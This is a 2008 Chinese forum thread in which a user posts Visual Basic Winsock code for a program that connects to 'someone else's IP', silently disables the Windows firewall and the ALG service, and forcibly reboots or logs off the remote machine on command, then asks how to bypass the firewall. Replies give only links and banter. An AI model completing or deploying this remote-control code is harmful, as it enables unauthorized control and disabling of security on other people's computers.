VB 实现穿过防火墙

swalp 2008-09-29 10:25:53
我做了个简单的TCP连接的东西,可是总是提示防火墙信息,总是不能实现通讯
程序如下:
服务端:
Private Sub Command1_Click()
Wc.SendData "Command=1" '送命令
End Sub

Private Sub Command2_Click()
Wc.SendData "Command=2" '?送命令
End Sub
Private Sub Form_Load()
Wc.RemoteHost = "172.17.2.57" '别人的IP
Wc.RemotePort = 1001
Wc.Connect
End Sub

客户端:
Private Sub Form_Load()
Shell "net stop alg", vbHide
Shell "netsh firewall set opmode disable", vbHide
Ws.LocalPort = 1001 '?听端口
Ws.Listen
End Sub

Private Sub Ws_Close()
Ws.Listen
End Sub

Private Sub Ws_ConnectionRequest(ByVal requestID As Long)
If Ws.State <> sckClosed Then Ws.Close
Ws.Accept requestID
End Sub

Private Sub Ws_DataArrival(ByVal bytesTotal As Long)
Dim tmp As String
Ws.GetData tmp, vbString
Select Case tmp
Case "Command=1"
'Shell "cmd /c shutdown -s -f -t 1", vbHide

Shell "shutdown -r -f -t 0", vbHide
MsgBox ""
Case "Command=2"
Shell "net stop alg", vbHide
Shell "netsh firewall set opmode disable", vbHide
Shell "shutdown -l -t 10" '十秒后注?
End Select
End Sub
总是提示连接出问题,可是权限低不能关闭防火墙。怎么能绕过防火墙阿。或有其他的解决方法阿。
...全文
157 8 打赏 收藏 转发到动态 举报
写回复
用AI写文章
8 条回复
切换为时间正序
请发表友善的回复…
发表回复
现在还是人类 2008-09-29
  • 打赏
  • 举报
回复
http://www.microsoft.com/downloads/details.aspx?FamilyId=C943C0DD-CEEC-4088-9753-86F052EC8450&displaylang=en
东方之珠 2008-09-29
  • 打赏
  • 举报
回复
给你个参考吧:
http://topic.csdn.net/t/20040829/16/3320204.html
swalp 2008-09-29
  • 打赏
  • 举报
回复
。。。。。。。。。。。。有翻译过来的版本吗?推荐一下
现在还是人类 2008-09-29
  • 打赏
  • 举报
回复
看不懂就用翻译软件慢慢看,呵呵
swalp 2008-09-29
  • 打赏
  • 举报
回复
Sorry 错怪你了,可是英文的我看不懂啊。我的四级还没过呢。
现在还是人类 2008-09-29
  • 打赏
  • 举报
回复
让你看SDK说我灌水,郁闷
  • 打赏
  • 举报
回复


你把一楼和二楼的两个链接都点开就知道了

 
swalp 2008-09-29
  • 打赏
  • 举报
回复
唉。怎么都是来灌水的阿。来点能帮忙解决问题的阿。

1,502

社区成员

发帖
与我相关
我的任务
社区描述
VB 网络编程
社区管理员
  • 网络编程
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧